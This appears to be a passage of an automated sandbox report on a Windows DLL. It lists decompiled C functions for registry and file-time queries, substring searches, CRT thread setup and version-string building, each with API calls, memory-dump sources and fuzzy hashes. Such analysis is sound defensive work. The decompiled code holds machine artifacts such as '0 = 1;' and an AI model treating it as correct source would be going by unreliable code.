                                                                                                                                                      				return _v44;
                                                                                                                                                      			}











                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00000101,00000000), ref: 1001F4CE
                                                                                                                                                      • RegQueryInfoKeyA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 1001F4F8
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F534
                                                                                                                                                      • __aulldiv.LIBCMT ref: 1001F54F
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 1001F55E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$CloseFileInfoOpenQuerySystem__aulldiv
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3147484438-0
                                                                                                                                                      • Opcode ID: a8ab192541b304aa3f493e8cdc4c5a5724217b095628cd1a61777f2edf0513dd
                                                                                                                                                      • Instruction ID: 6ac3f46dae9d66049611ff428ba7790207c0dca18eda03b4da7369df6ee0e458
                                                                                                                                                      • Opcode Fuzzy Hash: a8ab192541b304aa3f493e8cdc4c5a5724217b095628cd1a61777f2edf0513dd
                                                                                                                                                      • Instruction Fuzzy Hash: 6D21FC75E10208ABEB00CFD4C898FEEB7B9FF48704F108548E514BB290D7B59A45CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E1001F3D0(char* _a4) {
                                                                                                                                                      				struct _SYSTEMTIME _v20;
                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _v28;
                                                                                                                                                      				struct _FILETIME _v36;
                                                                                                                                                      				struct _FILETIME _v44;
                                                                                                                                                      				struct _FILETIME _v52;
                                                                                                                                                      				struct _FILETIME _v60;
                                                                                                                                                      				void* _v64;
                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _t44;
                                                                                                                                                      
                                                                                                                                                      				_v28 = 0;
                                                                                                                                                      				_v24 = 0;
                                                                                                                                                      				if(PathFileExistsA(_a4) != 0) {
                                                                                                                                                      					_v64 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x2000000, 0);
                                                                                                                                                      					if(_v64 != 0xffffffff && GetFileTime(_v64,  &_v36,  &_v44,  &_v52) != 0) {
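                                                                                                                                                      						/* Build 1970-01-01 00:00:00 (0x7b2 = 1970), the Unix epoch, as a FILETIME. It is subtracted from the file's creation time (_v36) and the result divided by 0x2710 (10000), turning 100 ns ticks into milliseconds since the epoch. */
                                                                                                                                                      						_v20.wYear = 0x7b2;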
                                                                                                                                                      						_v20.wMonth = 1;
                                                                                                                                                      						_v20.wDay = 1;
                                                                                                                                                      						_v20.wHour = 0;
                                                                                                                                                      						_v20.wMinute = 0;
                                                                                                                                                      						_v20.wSecond = 0;
                                                                                                                                                      						_v20.wMilliseconds = 0;
                                                                                                                                                      						SystemTimeToFileTime( &_v20,  &_v60);
                                                                                                                                                      						_t44 = _v36.dwLowDateTime - _v60.dwLowDateTime;
                                                                                                                                                      						asm("sbb eax, [ebp-0x34]");
                                                                                                                                                      						_v28 = E1000F290(_t44, _v36.dwHighDateTime, 0x2710, 0);
                                                                                                                                                      						_v24 = _t44;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _v28;
                                                                                                                                                      			}












                                                                                                                                                      APIs
                                                                                                                                                      • PathFileExistsA.SHLWAPI(?), ref: 1001F3E8
                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,02000000,00000000), ref: 1001F40C
                                                                                                                                                      • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 1001F42B
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F467
                                                                                                                                                      • __aulldiv.LIBCMT ref: 1001F482
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Time$CreateExistsPathSystem__aulldiv
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3038978132-0
                                                                                                                                                      • Opcode ID: e720a0e6c976b777c225cc2672a2eaa0af2df3213120956698ec805836ce489b
                                                                                                                                                      • Instruction ID: 94f5442095f36b7f33c28a28e912268f677076f0b3d524be3b20220ad1e1facd
                                                                                                                                                      • Opcode Fuzzy Hash: e720a0e6c976b777c225cc2672a2eaa0af2df3213120956698ec805836ce489b
                                                                                                                                                      • Instruction Fuzzy Hash: 9A21E875A10208ABEB00DFD4D899FEEB7B8EF08704F108608E505BB290D775A685CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E10019330(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				void* _t17;
                                                                                                                                                      				void* _t18;
                                                                                                                                                      				void* _t19;
                                                                                                                                                      				void* _t21;
                                                                                                                                                      				void* _t25;
                                                                                                                                                      				void* _t30;
                                                                                                                                                      				void* _t38;
                                                                                                                                                      				void* _t42;
                                                                                                                                                      				void* _t44;
                                                                                                                                                      				void* _t46;
                                                                                                                                                      
                                                                                                                                                      				_t38 = __edi;
                                                                                                                                                      				_t30 = __ebx;
                                                                                                                                                      				_t17 = E1000CAC0(_a4);
                                                                                                                                                      				_t18 = E1000CAC0(_a8);
                                                                                                                                                      				_t44 = _t42 + 8;
                                                                                                                                                      				if(_t17 >= _t18) {
                                                                                                                                                      					_v8 = _a4;
                                                                                                                                                      					_v12 = 0;
                                                                                                                                                      					while(1) {
                                                                                                                                                      						_t19 = E1000CAC0(_a8);
                                                                                                                                                      						_t21 = E1000CAC0(_a4);
                                                                                                                                                      						_t46 = _t44 + 8;
                                                                                                                                                      						if(_t19 + _v12 > _t21) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						_t25 = E1000E89F(_t30, _a8, _t38, _v8, _a8, E1000CAC0(_a8));
                                                                                                                                                      						_t44 = _t46 + 0x10;
                                                                                                                                                      						if(_t25 != 0) {
                                                                                                                                                      							_v12 = _v12 + 1;
                                                                                                                                                      							_v8 = _v8 + 1;
                                                                                                                                                      							continue;
                                                                                                                                                      						}
                                                                                                                                                      						return 1;
                                                                                                                                                      					}
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				return 0;
                                                                                                                                                      			}
















                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4218353326-0
                                                                                                                                                      • Opcode ID: 2e95c50b6762c7a11e15052646cc8f45d1bd71e23564d2a17366cbdfb9a5a65b
                                                                                                                                                      • Instruction ID: fd93541d7ed1397f6a851c7bfd43323bc4bd1343b06978e00cafc39966250b4e
                                                                                                                                                      • Opcode Fuzzy Hash: 2e95c50b6762c7a11e15052646cc8f45d1bd71e23564d2a17366cbdfb9a5a65b
                                                                                                                                                      • Instruction Fuzzy Hash: 571177BAE0420CE7DB10DFA8D88199E77A8DB04298F148565FD19EB345F531FF808792
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E100196D0(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				void* _t20;
                                                                                                                                                      				void* _t21;
                                                                                                                                                      				void* _t23;
                                                                                                                                                      				void* _t24;
                                                                                                                                                      				void* _t27;
                                                                                                                                                      				void* _t28;
                                                                                                                                                      				void* _t36;
                                                                                                                                                      				void* _t40;
                                                                                                                                                      				void* _t42;
                                                                                                                                                      				void* _t44;
                                                                                                                                                      
                                                                                                                                                      				_t36 = __edi;
                                                                                                                                                      				_t28 = __ebx;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				if(_a4 != 0 && _a8 != 0) {
                                                                                                                                                      					_t20 = E1000CAC0(_a4);
                                                                                                                                                      					_t21 = E1000CAC0(_a8);
                                                                                                                                                      					_t42 = _t40 + 8;
                                                                                                                                                      					if(_t20 >= _t21) {
                                                                                                                                                      						_v12 = 0;
                                                                                                                                                      						while(1) {
                                                                                                                                                      							_t23 = E1000CAC0(_a4);
                                                                                                                                                      							_t24 = E1000CAC0(_a8);
                                                                                                                                                      							_t44 = _t42 + 8;
                                                                                                                                                      							if(_v12 >= _t23 - _t24) {
                                                                                                                                                      								goto L9;
                                                                                                                                                      							}
                                                                                                                                                      							_t27 = E1000E89F(_t28, _a8, _t36, _a4 + _v12, _a8, E1000CAC0(_a8));
                                                                                                                                                      							_t42 = _t44 + 0x10;
                                                                                                                                                      							if(_t27 != 0) {
                                                                                                                                                      								_v12 = _v12 + 1;
                                                                                                                                                      								continue;
                                                                                                                                                      							} else {
                                                                                                                                                      								_v8 = 1;
                                                                                                                                                      							}
                                                                                                                                                      							goto L9;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				L9:
                                                                                                                                                      				return _v8;
                                                                                                                                                      			}
















                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4218353326-0
                                                                                                                                                      • Opcode ID: 8611dd32ed2c8444fb0f5c1ea4afab806a2b034aeaa9f588fce8cf00fcbf311d
                                                                                                                                                      • Instruction ID: 7552c70825ce5aa6cbe61f7ae5d70de39af72cecddf3b8ac3a80b57e73ca6885
                                                                                                                                                      • Opcode Fuzzy Hash: 8611dd32ed2c8444fb0f5c1ea4afab806a2b034aeaa9f588fce8cf00fcbf311d
                                                                                                                                                      • Instruction Fuzzy Hash: 4311ABBAD1420CEBDB14CFA4D485B9D77A4EF0428CF048165FC0A9B245E635EB84CB82
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 67%
                                                                                                                                                      			E1000EA65(void* __ebx, void* __edi) {
                                                                                                                                                      
                                                                                                                                                      				E100130A0();
                                                                                                                                                      				if(E100148B1(1, 0x214) != __edi) {
                                                                                                                                                      					_push(__esi);
                                                                                                                                                      					_push( *0x10332c68);
                                                                                                                                                      					__eax = E10013034( *0x10333820);
                                                                                                                                                      					__eflags = __eax;
                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                      						_push(__esi);
                                                                                                                                                      						__eax = E1000CA30(__ebx, __edi, __esi, __eflags);
                                                                                                                                                      						goto L1;
                                                                                                                                                      					} else {
                                                                                                                                                      						_push(__edi);
                                                                                                                                                      						_push(__esi);
                                                                                                                                                      						__eax = E10013107(__ebx, __edi, __esi, __eflags);
                                                                                                                                                      						__eax = GetCurrentThreadId();
                                                                                                                                                      						__esi[1] = __esi[1] | 0xffffffff;
                                                                                                                                                      						 *__esi = __eax;
                                                                                                                                                      						0 = 1;
                                                                                                                                                      						__eflags = 1;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return 0;
                                                                                                                                                      			}




                                                                                                                                                      APIs
                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 1000EA65
                                                                                                                                                        • Part of subcall function 100130A0: TlsGetValue.KERNEL32(100131CA), ref: 100130A6
                                                                                                                                                        • Part of subcall function 100130A0: __decode_pointer.LIBCMT ref: 100130B6
                                                                                                                                                        • Part of subcall function 100130A0: TlsSetValue.KERNEL32(00000000), ref: 100130C3
                                                                                                                                                      • __calloc_crt.LIBCMT ref: 1000EA71
                                                                                                                                                        • Part of subcall function 100148B1: __calloc_impl.LIBCMT ref: 100148BF
                                                                                                                                                        • Part of subcall function 100148B1: Sleep.KERNEL32(00000000,100131F0,00000001,00000214), ref: 100148D6
                                                                                                                                                      • __decode_pointer.LIBCMT ref: 1000EA8F
                                                                                                                                                        • Part of subcall function 10013034: TlsGetValue.KERNEL32(?,100133C2,00000000,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001,?,?,10330240), ref: 10013041
                                                                                                                                                        • Part of subcall function 10013034: TlsGetValue.KERNEL32(00000005,?,100133C2,00000000,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001), ref: 10013058
                                                                                                                                                      • __initptd.LIBCMT ref: 1000EA9D
                                                                                                                                                        • Part of subcall function 10013107: GetModuleHandleA.KERNEL32(KERNEL32.DLL,10330340,0000000C,10013219,00000000,00000000), ref: 10013118
                                                                                                                                                        • Part of subcall function 10013107: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10013141
                                                                                                                                                        • Part of subcall function 10013107: GetProcAddress.KERNEL32(?,DecodePointer), ref: 10013151
                                                                                                                                                        • Part of subcall function 10013107: InterlockedIncrement.KERNEL32(10332650), ref: 10013173
                                                                                                                                                        • Part of subcall function 10013107: ___addlocaleref.LIBCMT ref: 1001319A
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 1000EAA4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Value$AddressProc__decode_pointer$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref___set_flsgetvalue__calloc_crt__calloc_impl__initptd
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1662683381-0
                                                                                                                                                      • Opcode ID: 4523e30f6971cb40a2426855bbae9302a8168ff4489a0cf2ac2da806801fc158
                                                                                                                                                      • Instruction ID: d37afd26d2eadf3ef50fe9e24c1f066afac95630afcebaca695182ecfc570b21
                                                                                                                                                      • Opcode Fuzzy Hash: 4523e30f6971cb40a2426855bbae9302a8168ff4489a0cf2ac2da806801fc158
                                                                                                                                                      • Instruction Fuzzy Hash: 62F027373042A1ADF235F774AC4294E37C4EB8A3F1730892AF552EC0E5EE21E8808261
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                      			E1001A740(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				char _v279;
                                                                                                                                                      				char _v280;
                                                                                                                                                      				intOrPtr _v284;
                                                                                                                                                      				char _v312;
                                                                                                                                                      				signed int _v316;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				void* _t27;
                                                                                                                                                      				intOrPtr _t52;
                                                                                                                                                      				void* _t55;
                                                                                                                                                      
                                                                                                                                                      				_t51 = __esi;
                                                                                                                                                      				_t50 = __edi;
                                                                                                                                                      				_t37 = __ebx;
                                                                                                                                                      				_push(0xffffffff);
                                                                                                                                                      				_push(E10022AB3);
                                                                                                                                                      				_push( *[fs:0x0]);
                                                                                                                                                      				 *[fs:0x0] = _t52;
                                                                                                                                                      				_v316 = 0;
                                                                                                                                                      				E10001160( &_v312, __eflags, 0x10024c8f);
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v280 = 0;
                                                                                                                                                      				E1000CF20(__edi,  &_v279, 0, 0x103);
                                                                                                                                                      				E1001DC00(__ebx, _t50, __esi,  &_v280);
                                                                                                                                                      				_t46 =  &_v280;
                                                                                                                                                      				_t27 = E1000CAC0( &_v280);
                                                                                                                                                      				_t55 = _t52 - 0x12c + 0x10;
                                                                                                                                                      				_t59 = _t27;
                                                                                                                                                      				if(_t27 == 0) {
                                                                                                                                                      					E1000D8A3( &_v280,  &_v280, 0x104, "unknown err");
                                                                                                                                                      					_t55 = _t55 + 0xc;
                                                                                                                                                      				}
                                                                                                                                                      				_v284 = E1001A480(_t37, _t46, _t50, _t51, _t59,  &_v280);
                                                                                                                                                      				E100011C0( &_v312, _v284);
                                                                                                                                                      				_push(_v284);
                                                                                                                                                      				E1000CA30(_t37, _t50, _t51, _t59);
                                                                                                                                                      				E10001110(_a4, _t59,  &_v312);
                                                                                                                                                      				_v316 = _v316 | 0x00000001;
                                                                                                                                                      				_v8 = 0xffffffff;
                                                                                                                                                      				E100011A0( &_v312);
                                                                                                                                                      				 *[fs:0x0] = _v16;
                                                                                                                                                      				return _a4;
                                                                                                                                                      			}















                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001A794
                                                                                                                                                        • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC28
                                                                                                                                                        • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC45
                                                                                                                                                        • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC5B
                                                                                                                                                        • Part of subcall function 1001DC00: GetVersionExW.KERNEL32(00000114), ref: 1001DC74
                                                                                                                                                        • Part of subcall function 1001DC00: _strcpy_s.LIBCMT ref: 1001DDA9
                                                                                                                                                      • _strlen.LIBCMT ref: 1001A7AF
                                                                                                                                                      • _strcpy_s.LIBCMT ref: 1001A7CC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_strcpy_s$Version_strlen
                                                                                                                                                      • String ID: unknown err
                                                                                                                                                      • API String ID: 3541540748-813478822
                                                                                                                                                      • Opcode ID: dd71c00dc3e889e3b8e1fcdb10f070c2db9be79ce23929b4c0d2ec3d363c14be
                                                                                                                                                      • Instruction ID: 908e89cf5b9352ff889f1a9c3fa8eeef98413c65ec874cc1b061f0950b8e6722
                                                                                                                                                      • Opcode Fuzzy Hash: dd71c00dc3e889e3b8e1fcdb10f070c2db9be79ce23929b4c0d2ec3d363c14be
                                                                                                                                                      • Instruction Fuzzy Hash: 6F214FB5C0021CABDB28DB54DD82BD9B774EB04754F4041D4B609A7285EB74BB84CFD2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001815A(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				char _v20;
                                                                                                                                                      				char _t43;
                                                                                                                                                      				char _t46;
                                                                                                                                                      				signed int _t53;
                                                                                                                                                      				signed int _t54;
                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                      				intOrPtr _t57;
                                                                                                                                                      				int _t58;
                                                                                                                                                      				signed short* _t59;
                                                                                                                                                      				short* _t60;
                                                                                                                                                      				int _t65;
                                                                                                                                                      				char* _t72;
                                                                                                                                                      
                                                                                                                                                      				_t72 = _a8;
                                                                                                                                                      				if(_t72 == 0 || _a12 == 0) {
                                                                                                                                                      					L5:
                                                                                                                                                      					return 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					if( *_t72 != 0) {
                                                                                                                                                      						E1000D4F5( &_v20, __edi, _a16);
                                                                                                                                                      						_t43 = _v20;
                                                                                                                                                      						__eflags =  *(_t43 + 0x14);
                                                                                                                                                      						if( *(_t43 + 0x14) != 0) {
                                                                                                                                                      							_t46 = E10013A1A( *_t72 & 0x000000ff,  &_v20);
                                                                                                                                                      							__eflags = _t46;
                                                                                                                                                      							if(_t46 == 0) {
                                                                                                                                                      								__eflags = _a4;
                                                                                                                                                      								_t40 = _v20 + 4; // 0x840ffff8
                                                                                                                                                      								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                      									L10:
                                                                                                                                                      									__eflags = _v8;
                                                                                                                                                      									if(_v8 != 0) {
                                                                                                                                                      										_t53 = _v12;
                                                                                                                                                      										_t11 = _t53 + 0x70;
                                                                                                                                                      										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                                                                      										__eflags =  *_t11;
                                                                                                                                                      									}
                                                                                                                                                      									return 1;
                                                                                                                                                      								}
                                                                                                                                                      								L21:
                                                                                                                                                      								_t54 = E1000F720(__eflags);
                                                                                                                                                      								 *_t54 = 0x2a;
                                                                                                                                                      								__eflags = _v8;
                                                                                                                                                      								if(_v8 != 0) {
                                                                                                                                                      									_t54 = _v12;
                                                                                                                                                      									_t33 = _t54 + 0x70;
                                                                                                                                                      									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                                                      									__eflags =  *_t33;
                                                                                                                                                      								}
                                                                                                                                                      								return _t54 | 0xffffffff;
                                                                                                                                                      							}
                                                                                                                                                      							_t56 = _v20;
                                                                                                                                                      							_t15 = _t56 + 0xac; // 0xa045ff98
                                                                                                                                                      							_t65 =  *_t15;
                                                                                                                                                      							__eflags = _t65 - 1;
                                                                                                                                                      							if(_t65 <= 1) {
                                                                                                                                                      								L17:
                                                                                                                                                      								_t24 = _t56 + 0xac; // 0xa045ff98
                                                                                                                                                      								__eflags = _a12 -  *_t24;
                                                                                                                                                      								if(__eflags < 0) {
                                                                                                                                                      									goto L21;
                                                                                                                                                      								}
                                                                                                                                                      								__eflags = _t72[1];
                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                      									goto L21;
                                                                                                                                                      								}
                                                                                                                                                      								L19:
                                                                                                                                                      								__eflags = _v8;
                                                                                                                                                      								_t27 = _t56 + 0xac; // 0xa045ff98
                                                                                                                                                      								_t57 =  *_t27;
                                                                                                                                                      								if(_v8 == 0) {
                                                                                                                                                      									return _t57;
                                                                                                                                                      								}
                                                                                                                                                      								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                                                      								return _t57;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _a12 - _t65;
                                                                                                                                                      							if(_a12 < _t65) {
                                                                                                                                                      								goto L17;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _a4;
                                                                                                                                                      							_t21 = _t56 + 4; // 0x840ffff8
                                                                                                                                                      							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                      							__eflags = _t58;
                                                                                                                                                      							_t56 = _v20;
                                                                                                                                                      							if(_t58 != 0) {
                                                                                                                                                      								goto L19;
                                                                                                                                                      							}
                                                                                                                                                      							goto L17;
                                                                                                                                                      						}
                                                                                                                                                      						_t59 = _a4;
                                                                                                                                                      						__eflags = _t59;
                                                                                                                                                      						if(_t59 != 0) {
                                                                                                                                                      							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                                                                      						}
                                                                                                                                                      						goto L10;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t60 = _a4;
                                                                                                                                                      						if(_t60 != 0) {
                                                                                                                                                      							 *_t60 = 0;
                                                                                                                                                      						}
                                                                                                                                                      						goto L5;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      			}

















                                                                                                                                                      0x100181ef
                                                                                                                                                      0x100181f5
                                                                                                                                                      0x100181f7
                                                                                                                                                      0x100181fa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100181fa
                                                                                                                                                      0x10018197
                                                                                                                                                      0x1001819a
                                                                                                                                                      0x1001819c
                                                                                                                                                      0x100181a2
                                                                                                                                                      0x100181a2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10018174
                                                                                                                                                      0x10018174
                                                                                                                                                      0x10018179
                                                                                                                                                      0x1001817b
                                                                                                                                                      0x1001817b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10018179
                                                                                                                                                      0x10018172

                                                                                                                                                      APIs
                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1001818A
                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 100181BE
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,10016B7E,?,?,00000002), ref: 100181EF
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,10016B7E,?,?,00000002), ref: 1001825D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                      • Opcode ID: 5e8ca58f192645aeac23bdabe86f34e73e76cd9a67157fe0bad94941ff89931c
                                                                                                                                                      • Instruction ID: 8c2b7c8d3196bbd4c2d7993dcbbe5c0e1781117acee873ad45468beb87eff19f
                                                                                                                                                      • Opcode Fuzzy Hash: 5e8ca58f192645aeac23bdabe86f34e73e76cd9a67157fe0bad94941ff89931c
                                                                                                                                                      • Instruction Fuzzy Hash: 37318D32A04296FFEB11CFA4CC819AE7BE9FF02251F1585A9E4509F1A1D730DB81DB51
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A370(void* __ebx, void* __edi, void* __esi, char* _a4) {
                                                                                                                                                      				int _v8;
                                                                                                                                                      				int _v12;
                                                                                                                                                      				short* _v16;
                                                                                                                                                      
                                                                                                                                                      				_v16 = 0;
                                                                                                                                                      				_v12 = E1000CAC0(_a4);
